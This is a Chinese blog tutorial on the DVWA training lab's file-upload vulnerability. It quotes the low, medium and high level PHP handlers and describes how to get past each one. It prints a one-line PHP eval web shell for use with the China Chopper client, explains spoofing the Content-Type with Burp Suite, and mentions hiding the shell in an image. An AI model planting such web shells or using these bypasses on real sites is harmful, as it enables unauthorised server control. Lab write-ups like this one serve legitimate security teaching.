1.dvwap的low安全模式下,也就是当网站对上传的文件类型没有限制,给出的源代码如下:
<!-- wp:paragraph -->
<p><?php<br>if (isset($_POST['Upload'])) {</p>
<!-- /wp:paragraph -->
<!-- wp:code -->
<pre class="wp-block-code"><code> $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}?></code></pre>
<!-- /wp:code -->
可以上传php小木马脚本文件,其中写入如下一行代码:
通过爬取得到网站的目录结构后,利用中国菜刀等工具,输入url及密码pass(php脚本写入的密码),进入网站后门,进行自由的上传下载网站文件等。
<?php @eval($_POST['password']) ?>
2.middle安全模式下时,对网站的上传文件有mine类型的限制,给出的源代码如下:
<!-- wp:paragraph -->
<p><?php<br>if (isset($_POST['Upload'])) {</p>
<!-- /wp:paragraph -->
<!-- wp:code -->
<pre class="wp-block-code"><code> $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}?></code></pre>
<!-- /wp:code -->
加了只通过jepg的mine类型的判定条件后(关于mine类型,w3c给出的对比参考手册:MIME 参考手册),我们的.php脚本无法上传,这是可以用攻击机kali自带的burpsuite进行代理拦截,给浏览器加上代理后(具体怎么加代理,或怎么让burpsuite可以代理到物理机以后发布),通过proxy拦截了提交文件的请求,可以看到这时content-type是application/octet-stream,改为
jepg即可,发送请求出去后我们发现.php上传成功,我们成功绕过了这层拦截。
3.最后high级别的安全模式下,源代码如下:
<!-- wp:paragraph -->
<p><?php<br>if (isset($_POST['Upload'])) {<br>$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";<br>$target_path = $target_path . basename($_FILES['uploaded']['name']);<br>$uploaded_name = $_FILES['uploaded']['name'];<br>$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);<br>$uploaded_size = $_FILES['uploaded']['size'];<br>if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" ||<br>$uploaded_ext == "JPEG") && ($uploaded_size < 100000)){<br>if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {</p>
<!-- /wp:paragraph -->
<!-- wp:code -->
<pre class="wp-block-code"><code> echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
}?></code></pre>
<!-- /wp:code -->
可以看到这次不再是通过mine来筛选了,而是直接改成了必须上传的为固定的图片格式后缀才能成功,就算你利用了burpsuite设置代理拦截,修改文件的扩展名,也不能通过菜刀获取服务器的控制权,因为php文件修改了以jpg为扩展名后在服务器没法解析,这时可以通过图片木马实现。也就是通过图片木马制作工具在图片插入们上上面的一句话木马,再将图片上传上去,之后内容涉及到文件包涵漏洞分析,之后进行发布。
Comments | NOTHING